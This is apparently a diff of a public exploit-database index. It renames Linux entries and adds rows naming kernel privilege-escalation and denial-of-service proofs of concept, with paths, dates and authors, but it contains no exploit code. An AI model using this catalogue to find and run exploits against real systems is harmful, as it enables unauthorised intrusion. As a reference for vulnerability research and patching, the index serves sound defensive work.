+39669,exploits/linux_x86/dos/39669.txt,"Linux Kernel (x86) - Disable ASLR by Setting the RLIMIT_STACK Resource to Unlimited",2016-04-06,"Hector Marco & Ismael Ripoll",dos,linux_x86,
 39685,exploits/android/dos/39685.txt,"Google Android - IOMX 'getConfig'/'getParameter' Information Disclosure",2016-04-11,"Google Security Research",dos,android,
 39686,exploits/android/dos/39686.txt,"Google Android - IMemory Native Interface is Insecure for IPC Use",2016-04-11,"Google Security Research",dos,android,
 39699,exploits/windows/dos/39699.html,"Microsoft Internet Explorer 11 - MSHTML!CMarkupPointer::UnEmbed Use-After-Free",2016-04-15,"Marcin Ressel",dos,windows,
@@ -5203,7 +5203,7 @@ id,file,description,date,author,type,platform,port
 40073,exploits/windows/dos/40073.py,"Microsoft Process Kill Utility (kill.exe) 6.3.9600.17298 - Crash (PoC)",2016-07-08,hyp3rlinx,dos,windows,
 40074,exploits/windows/dos/40074.txt,"Microsoft WinDbg - 'logviewer.exe' Crash (PoC)",2016-07-08,hyp3rlinx,dos,windows,
 40183,exploits/multiple/dos/40183.html,"WebKit - TypedArray.fill Memory Corruption",2016-07-29,"Google Security Research",dos,multiple,
-40182,exploits/arm/dos/40182.txt,"Linux ARM/ARM64 - 'perf_event_open()' Arbitrary Memory Read",2016-07-29,"Google Security Research",dos,arm,
+40182,exploits/arm/dos/40182.txt,"Linux Kernel (ARM/ARM64) - 'perf_event_open()' Arbitrary Memory Read",2016-07-29,"Google Security Research",dos,arm,
 40310,exploits/multiple/dos/40310.txt,"Adobe Flash - BitmapData.copyPixels Use-After-Free",2016-08-29,"Google Security Research",dos,multiple,
 40181,exploits/linux/dos/40181.c,"AppArmor securityfs < 4.8 - 'aa_fs_seq_hash_show' Reference Count Leak",2016-07-29,"Google Security Research",dos,linux,
 40155,exploits/php/dos/40155.py,"PHP 5.5.37/5.6.23/7.0.8 - 'bzread()' Out-of-Bounds Write",2016-07-25,"Hans Jerry Illikainen",dos,php,80
@@ -5839,7 +5839,7 @@ id,file,description,date,author,type,platform,port
 43175,exploits/multiple/dos/43175.html,"WebKit - 'WebCore::RenderObject::previousSibling' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
 43176,exploits/multiple/dos/43176.html,"WebKit - 'WebCore::FormSubmission::create' Use-After-Free",2017-11-22,"Google Security Research",dos,multiple,
 43464,exploits/android/dos/43464.txt,"Android - Inter-Process munmap due to Race Condition in ashmem",2018-01-08,"Google Security Research",dos,android,
-43178,exploits/linux/dos/43178.c,"Linux - 'mincore()' Uninitialized Kernel Heap Page Disclosure",2017-11-24,"Google Security Research",dos,linux,
+43178,exploits/linux/dos/43178.c,"Linux Kernel - 'mincore()' Uninitialized Kernel Heap Page Disclosure",2017-11-24,"Google Security Research",dos,linux,
 43180,exploits/windows/dos/43180.js,"Microsoft Edge Chakra JIT - 'BailOutOnTaggedValue' Bailouts Type Confusion",2017-11-27,"Google Security Research",dos,windows,
 43181,exploits/windows/dos/43181.js,"Microsoft Edge Chakra JIT - 'Inline::InlineCallApplyTarget_Shared' does not Return the return Instruction",2017-11-27,"Google Security Research",dos,windows,
 43182,exploits/windows/dos/43182.js,"Microsoft Edge Chakra JIT - Incorrect Function Declaration Scope",2017-11-27,"Google Security Research",dos,windows,
@@ -5850,7 +5850,7 @@ id,file,description,date,author,type,platform,port
 43189,exploits/android/dos/43189.py,"Android Gmail < 7.11.5.176568039 - Directory Traversal in Attachment Download",2017-11-28,"Google Security Research",dos,android,
 43194,exploits/linux/dos/43194.txt,"QEMU - NBD Server Long Export Name Stack Buffer Overflow",2017-11-29,"Eric Blake",dos,linux,
 43470,exploits/windows/dos/43470.cpp,"Microsoft Windows - 'nt!NtQueryInformationProcess (information class 76_ QueryProcessEnergyValues)' Kernel Stack Memory Disclosure",2018-01-09,"Google Security Research",dos,windows,
-43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page",2017-11-30,Bindecy,dos,linux,
+43199,exploits/linux/dos/43199.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (1)",2017-11-30,Bindecy,dos,linux,
 43469,exploits/windows/dos/43469.js,"Microsoft Edge Chakra JIT - Escape Analysis Bug",2018-01-09,"Google Security Research",dos,windows,
 43207,exploits/windows/dos/43207.txt,"Abyss Web Server < 2.11.6 - Heap Memory Corruption",2017-12-01,hyp3rlinx,dos,windows,
 43229,exploits/windows/dos/43229.cs,"Microsoft Windows Defender - Controlled Folder Bypass Through UNC Path",2017-12-07,"Google Security Research",dos,windows,
@@ -5901,6 +5901,9 @@ id,file,description,date,author,type,platform,port
 44268,exploits/android/dos/44268.txt,"Broadcom BCM43xx Wi-Fi  - 'BroadPWN' Denial of Service",2016-12-01,649,dos,android,
 44271,exploits/windows/dos/44271.py,"WebLog Expert Enterprise 9.4 - Denial of Service",2018-03-09,hyp3rlinx,dos,windows,
 44291,exploits/android/dos/44291.cpp,"Android DRM Services - Buffer Overflow",2018-03-15,"Tamir Zahavi-Brunner",dos,android,
+44301,exploits/linux/dos/44301.c,"Linux Kernel < 4.5.1 - Off-By-One (PoC)",2016-10-16,"Vitaly Nikolenko",dos,linux,
+44304,exploits/linux/dos/44304.c,"Linux Kernel - 'mincore()' Heap Page Disclosure (PoC)",2017-12-11,anonymous,dos,linux,
+44305,exploits/linux/dos/44305.c,"Linux Kernel - 'The Huge Dirty Cow' Overwriting The Huge Zero Page (2)",2017-12-11,anonymous,dos,linux,
 3,exploits/linux/local/3.c,"Linux Kernel 2.2.x/2.4.x (RedHat) - 'ptrace/kmod' Local Privilege Escalation",2003-03-30,"Wojciech Purczynski",local,linux,
 4,exploits/solaris/local/4.c,"Sun SUNWlldap Library Hostname - Local Buffer Overflow",2003-04-01,Andi,local,solaris,
 12,exploits/linux/local/12.c,"Linux Kernel < 2.4.20 - Module Loader Privilege Escalation",2003-04-14,KuRaK,local,linux,
@@ -7601,7 +7604,7 @@ id,file,description,date,author,type,platform,port
 19293,exploits/windows/local/19293.py,"Sysax 5.62 - Admin Interface Local Buffer Overflow",2012-06-20,"Craig Freyman",local,windows,
 19602,exploits/linux/local/19602.c,"Eric Allman Sendmail 8.8.x - Socket Hijack",1999-11-05,"Michal Zalewski",local,linux,
 19300,exploits/aix/local/19300.txt,"IBM AIX 4.2.1 - 'snap' Insecure Temporary File Creation",1999-02-17,"Larry W. Cashdollar",local,aix,
-19302,exploits/linux/local/19302.c,"Linux libc 5.3.12 / RedHat Linux 4.0 / Slackware Linux 3.1 - libc NLSPATH",1998-01-19,Solar,local,linux,
+19302,exploits/linux/local/19302.c,"Linux libc 5.3.12 (RedHat Linux 4.0 / Slackware Linux 3.1) - libc NLSPATH",1998-01-19,Solar,local,linux,
 19304,exploits/irix/local/19304.txt,"SGI IRIX 6.4 - 'inpview' Local Privilege Escalation",1997-05-07,"Yuri Volobuev",local,irix,
 19305,exploits/linux/local/19305.c,"RedHat Linux 5.0 - 'msgchk' Local Privilege Escalation",1998-01-19,"Cesar Tascon Alvarez",local,linux,
 19306,exploits/aix/local/19306.c,"IBM AIX 4.2.1 - '/usr/bin/portmir' Local Buffer Overflow / Insecure Temporary File Creation",1997-10-29,"BM ERS Team",local,aix,
@@ -7635,7 +7638,7 @@ id,file,description,date,author,type,platform,port
 19356,exploits/irix/local/19356.txt,"SGI IRIX 6.3 - 'Systour' / 'OutOfBox' Local Privilege Escalation",1996-10-30,"Tun-Hui Hu",local,irix,
 19358,exploits/irix/local/19358.txt,"SGI IRIX 6.4 - 'xfsdump' Local Privilege Escalation",1997-05-07,"Yuri Volobuev",local,irix,
 19359,exploits/windows/local/19359.txt,"Microsoft Windows NT 4.0/SP1/SP2/SP3/SP4 / NT 3.5.1/SP1/SP2/SP3/SP4/SP5 - Screensaver",1999-03-10,"Cybermedia Software Private Limited",local,windows,
-19360,exploits/linux/local/19360.c,"Linux libc 5.3.12/5.4 / RedHat Linux 4.0 - 'vsyslog()' Local Buffer Overflow",1997-12-21,"Solar Designer",local,linux,
+19360,exploits/linux/local/19360.c,"Linux libc 5.3.12/5.4 (RedHat Linux 4.0) - 'vsyslog()' Local Buffer Overflow",1997-12-21,"Solar Designer",local,linux,
 19362,exploits/sco/local/19362.c,"SCO Open Server 5.0.5 - XBase Buffer Overflow",1999-06-14,doble,local,sco,
 19384,exploits/linux/local/19384.c,"Debian 2.1 - Print Queue Control",1999-07-02,"Chris Leishman",local,linux,
 19370,exploits/linux/local/19370.c,"Xi Graphics Accelerated X 4.0.x/5.0 - Local Buffer Overflow",1999-06-25,KSR[T],local,linux,
@@ -8013,7 +8016,7 @@ id,file,description,date,author,type,platform,port
 20906,exploits/unix/local/20906.c,"kosch suid wrapper 1.1.1 - Local Buffer Overflow",2001-06-07,dex,local,unix,
 20915,exploits/windows/local/20915.py,"ActFax Server 4.31 Build 0225 - Local Privilege Escalation",2012-08-29,"Craig Freyman",local,windows,
 20923,exploits/unix/local/20923.c,"LPRng 3.6.x - Failure To Drop Supplementary Groups",2001-06-07,zen-parse,local,unix,
-20926,exploits/linux/local/20926.txt,"Linux 6.1/6.2/7.0/7.1 Man Page - Source Buffer Overflow",2001-06-12,zen-parse,local,linux,
+20926,exploits/linux/local/20926.txt,"Linux Man Page 6.1/6.2/7.0/7.1- Source Buffer Overflow",2001-06-12,zen-parse,local,linux,
 20927,exploits/linux/local/20927.c,"BestCrypt 0.6/0.7/0.8 - BCTool UMount Buffer Overflow",2001-06-14,"Carl Livitt",local,linux,
 20928,exploits/linux/local/20928.sh,"Rxvt 2.6.1/2.6.2 - Local Buffer Overflow",2001-06-15,MasterSecuritY,local,linux,
 20937,exploits/irix/local/20937.c,"SGI Performance Co-Pilot 2.1.x/2.2 - pmpost Symbolic Link",2001-06-18,IhaQueR,local,irix,
@@ -8403,7 +8406,7 @@ id,file,description,date,author,type,platform,port
 23611,exploits/multiple/local/23611.pl,"OracleAS TopLink Mapping Workbench - Weak Encryption Algorithm",2004-01-28,"Pete Finnigan",local,multiple,
 23634,exploits/linux/local/23634.c,"0verkill 0.16 - Game Client Multiple Local Buffer Overflow Vulnerabilities",2004-02-02,pi3ki31ny,local,linux,
 23655,exploits/bsd/local/23655.txt,"BSD - SHMAT System Call Privilege Escalation",2004-02-05,"Joost Pol",local,bsd,
-23658,exploits/linux/local/23658.c,"Linux VServer Project 1.2x - CHRoot Breakout",2004-02-06,"Markus Mueller",local,linux,
+23658,exploits/linux/local/23658.c,"Linux VServer Project 1.2x - Chroot Breakout",2004-02-06,"Markus Mueller",local,linux,
 23674,exploits/linux/local/23674.txt,"Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation",2004-02-09,"Martin Fiala",local,linux,
 23682,exploits/linux/local/23682.c,"XFree86 4.3 - Font Information File Buffer Overflow",2004-11-10,bender2@lonestar.org,local,linux,
 23738,exploits/linux/local/23738.c,"LGames LBreakout2 2.2.2 - Multiple Environment Variable Buffer Overflow Vulnerabilities",2004-02-21,Li0n7,local,linux,
@@ -8978,8 +8981,8 @@ id,file,description,date,author,type,platform,port
 37825,exploits/osx/local/37825.txt,"Apple Mac OSX 10.10.5 - 'XNU' Local Privilege Escalation",2015-08-18,kpwn,local,osx,
 37710,exploits/linux/local/37710.txt,"Sudo 1.8.14 (RHEL 5/6/7 / Ubuntu) - 'Sudoedit' Unauthorized Privilege Escalation",2015-07-28,"daniel svartman",local,linux,
 37716,exploits/windows/local/37716.c,"Heroes of Might and Magic III - Map Parsing Arbitrary Code Execution",2015-07-29,"John AAkerblom",local,windows,
-37722,exploits/linux_x86-64/local/37722.c,"Linux espfix64 - Nested NMIs Interrupting Privilege Escalation",2015-08-05,"Andrew Lutomirski",local,linux_x86-64,
+37722,exploits/linux_x86-64/local/37722.c,"Linux Kernel - 'espfix64' Nested NMIs Interrupting Privilege Escalation",2015-08-05,"Andrew Lutomirski",local,linux_x86-64,
-37724,exploits/linux_x86/local/37724.asm,"Linux (x86) - Memory Sinkhole Privilege Escalation",2015-08-07,"Christopher Domas",local,linux_x86,
+37724,exploits/linux_x86/local/37724.asm,"Linux Kernel (x86) - Memory Sinkhole Privilege Escalation",2015-08-07,"Christopher Domas",local,linux_x86,
 37730,exploits/windows/local/37730.py,"Tomabo MP4 Player 3.11.3 - '.m3u' Local Buffer Overflow (SEH)",2015-08-07,"Saeid Atabaki",local,windows,
 37732,exploits/windows_x86/local/37732.c,"Microsoft Windows XP SP3 (x86) / 2003 SP2 (x86) - 'NDProxy' Local Privilege Escalation (MS14-002)",2015-08-07,"Tomislav Paskalev",local,windows_x86,
 38106,exploits/aix/local/38106.txt,"IBM AIX High Availability Cluster Multiprocessing (HACMP) - Local Privilege Escalation",2015-09-08,"Kristian Erik Hermansen",local,aix,
@@ -9046,7 +9049,7 @@ id,file,description,date,author,type,platform,port
 38452,exploits/windows/local/38452.txt,"CDex Genre 1.79 - Local Stack Buffer Overflow",2015-10-13,Un_N0n,local,windows,
 38467,exploits/windows/local/38467.py,"AdobeWorkgroupHelper 2.8.3.3 - Local Stack Buffer Overflow",2015-10-15,hyp3rlinx,local,windows,
 38472,exploits/windows/local/38472.py,"Blat 2.7.6 SMTP / NNTP Mailer - Local Buffer Overflow",2015-10-15,hyp3rlinx,local,windows,
-38473,exploits/linux/local/38473.py,"Linux 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass",2015-10-15,soyer,local,linux,
+38473,exploits/linux/local/38473.py,"Linux Kernel 3.17 - 'Python ctypes and memfd_create' noexec File Security Bypass",2015-10-15,soyer,local,linux,
 38474,exploits/windows/local/38474.txt,"Microsoft Windows 10 - Sandboxed Mount Reparse Point Creation Mitigation Bypass (MS15-111)",2015-10-15,"Google Security Research",local,windows,
 38486,exploits/windows/local/38486.py,"Tomabo MP4 Player 3.11.6 - Local Stack Overflow (SEH)",2015-10-18,"yokoacc_ nudragn_ rungga_reksya",local,windows,
 38504,exploits/windows/local/38504.py,"HandyPassword 4.9.3 - Overwrite (SEH)",2015-10-21,Un_N0n,local,windows,
@@ -9171,7 +9174,7 @@ id,file,description,date,author,type,platform,port
 40054,exploits/linux/local/40054.c,"Exim 4 (Debian 8 / Ubuntu 16.04) - Spool Privilege Escalation",2016-07-04,halfdog,local,linux,
 39980,exploits/windows/local/39980.rb,"Tomabo MP4 Player 3.11.6 - Local Stack Overflow (SEH) (Metasploit)",2016-06-20,s0nk3y,local,windows,
 39984,exploits/windows_x86-64/local/39984.txt,"ACROS Security 0patch 2016.05.19.539 - '0PatchServicex64.exe' Unquoted Service Path Privilege Escalation",2016-06-20,LiquidWorm,local,windows_x86-64,
-39992,exploits/linux/local/39992.md,"Linux - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation",2016-06-21,"Google Security Research",local,linux,
+39992,exploits/linux/local/39992.md,"Linux Kernel - 'ecryptfs' '/proc/$pid/environ' Local Privilege Escalation",2016-06-21,"Google Security Research",local,linux,
 40017,exploits/windows/local/40017.py,"Mediacoder 0.8.43.5830 - '.m3u' Local Buffer Overflow (SEH)",2016-06-27,"Sibusiso Sishi",local,windows,
 40018,exploits/windows/local/40018.py,"VUPlayer 2.49 (Windows 7) - '.m3u' Local Buffer Overflow (DEP Bypass)",2016-06-27,secfigo,local,windows,
 40020,exploits/windows/local/40020.txt,"Panda Security (Multiple Products) - Local Privilege Escalation",2016-06-27,Security-Assessment.com,local,windows,
@@ -9590,6 +9593,12 @@ id,file,description,date,author,type,platform,port
 44270,exploits/windows/local/44270.txt,"WebLog Expert Enterprise 9.4 - Authentication Bypass",2018-03-09,hyp3rlinx,local,windows,
 44279,exploits/linux/local/44279.py,"SC 7.16 - Stack-Based Buffer Overflow",2018-03-12,"Juan Sacco",local,linux,
 44282,exploits/hardware/local/44282.txt,"Sony Playstation 4 (PS4) 4.55 < 5.50 - WebKit Code Execution (PoC)",2018-03-10,qwertyoruiop,local,hardware,
+44298,exploits/linux/local/44298.c,"Linux Kernel < 4.4.0-116 (Ubuntu 16.04.4) - Local Privilege Escalation",2018-03-16,"Bruce Leidl",local,linux,
+44299,exploits/linux/local/44299.c,"Linux Kernel < 3.5.0-23 (Ubuntu 12.04.2 x64) -  'SOCK_DIAG' SMEP Bypass Local Privilege Escalation",2018-03-19,"Vitaly Nikolenko",local,linux,
+44300,exploits/linux/local/44300.c,"Linux Kernel < 4.4.0-21 (Ubuntu 16.04 x64) -  'netfilter target_offset' Local Privilege Escalation",2018-03-19,"Vitaly Nikolenko",local,linux,
+44302,exploits/linux/local/44302.c,"Linux Kernel < 3.16.39 (Debian 8 x64) - 'inotfiy' Local Privilege Escalation",2017-10-16,"Jeremy Huang",local,linux,
+44303,exploits/linux/local/44303.c,"Linux Kernel 4.13 (Debian 9) - Local Privilege Escalation",2017-12-11,anonymous,local,linux,
+44306,exploits/hardware/local/44306.c,"Huawei Mate 7 - '/dev/hifi_misc' Privilege Escalation",2016-01-24,pray3r,local,hardware,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139